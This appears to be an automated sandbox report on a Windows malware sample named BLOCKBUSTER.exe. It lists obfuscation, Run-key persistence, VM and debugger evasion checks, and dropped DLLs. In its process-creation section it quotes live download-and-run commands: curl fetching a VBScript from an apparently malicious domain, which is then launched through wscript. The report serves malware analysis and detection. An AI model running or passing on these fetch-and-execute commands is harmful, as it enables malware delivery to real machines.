Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\SysWOW64\taskkill.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: wkernel32.pdb source: BLOCKBUSTER.exe, 0000000E.00000003.2349989495.000000000D5C4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: BLOCKBUSTER.exe, 0000000E.00000002.2569344059.000000006FCF5000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wkernel32.pdbUGP source: BLOCKBUSTER.exe, 0000000E.00000003.2349989495.000000000D5C4000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Contains functionality to dynamically determine API calls

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCF1767 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_6FCF1767

PE file contains sections with non-standard names

Source: 7zxa.dll.9.dr

Static PE information: section name: .didata

Uses code obfuscation techniques (call, push, ret)

Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCEDE65 push ecx; ret		14_2_6FCEDE78
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCEBD4A push esi; iretd		14_2_6FCEBD4B

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Drops PE files

Source: C:\Windows\System32\wscript.exe	File created: C:\_672365339188b\unrar.dll	Jump to dropped file
Source: C:\_672365339188b\BLOCKBUSTER.exe	File created: C:\Users\user\AppData\Local\Temp\hcx.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\_672365339188b\7zxa.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\_672365339188b\BLOCKBUSTER.exe	Jump to dropped file

Source: C:\_672365339188b\BLOCKBUSTER.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BLOCKBUSTER			Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BLOCKBUSTER			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Overwrites code with function prologues

Source: C:\_672365339188b\BLOCKBUSTER.exe	Memory written: PID: 4828 base: CC40000 value: 8B FF 55 8B EC E9 EB 4F 60 69	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Memory written: PID: 4828 base: CC50000 value: 8B FF 55 8B EC E9 3B 52 5F 69	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Memory written: PID: 4828 base: CC60000 value: 8B FF 55 8B EC E9 2B 2E 5E 69	Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 2530
Source: unknown	Network traffic detected: HTTP traffic on port 2530 -> 49950

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Source: C:\_672365339188b\BLOCKBUSTER.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Battery

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found dropped PE file which has not been started or loaded

Source: C:\_672365339188b\BLOCKBUSTER.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hcx.dll

Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\_672365339188b\BLOCKBUSTER.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\_672365339188b\BLOCKBUSTER.exe

API coverage: 0.6 %

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Windows\System32\wscript.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCDC2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,

14_2_6FCDC2D0

Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;0
Source: curl.exe, 00000004.00000003.2175511371.000001C44D3A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldd5XP
Source: BLOCKBUSTER.exe, 0000000E.00000003.2385060468.0000000000F29000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BLOCKBUSTER.exe, 0000000E.00000002.2390916545.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(

Source: C:\_672365339188b\BLOCKBUSTER.exe

API call chain: ExitProcess graph end node

Source: C:\_672365339188b\BLOCKBUSTER.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCE9D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

14_2_6FCE9D73

Contains functionality to dynamically determine API calls

Source: C:\_672365339188b\BLOCKBUSTER.exe

Code function: 14_2_6FCF1767 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

14_2_6FCF1767

Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCE9D73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_6FCE9D73
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCF13E1 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	14_2_6FCF13E1
Source: C:\_672365339188b\BLOCKBUSTER.exe	Code function: 14_2_6FCEF0D4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_6FCEF0D4

Source: C:\_672365339188b\BLOCKBUSTER.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: 7zxa.dll.9.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 64.95.10.38 80

Jump to behavior

Excessive usage of taskkill to terminate processes

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im BLOCKBUSTER.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\6723653391970.vbs https://endesa.click/672365339188b/6723653391970.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\_672365339188b\BLOCKBUSTER.exe "C:\_672365339188b\BLOCKBUSTER.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6723653391970.vbs"
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\_672365339188b\MPDK.bat	Jump to behavior
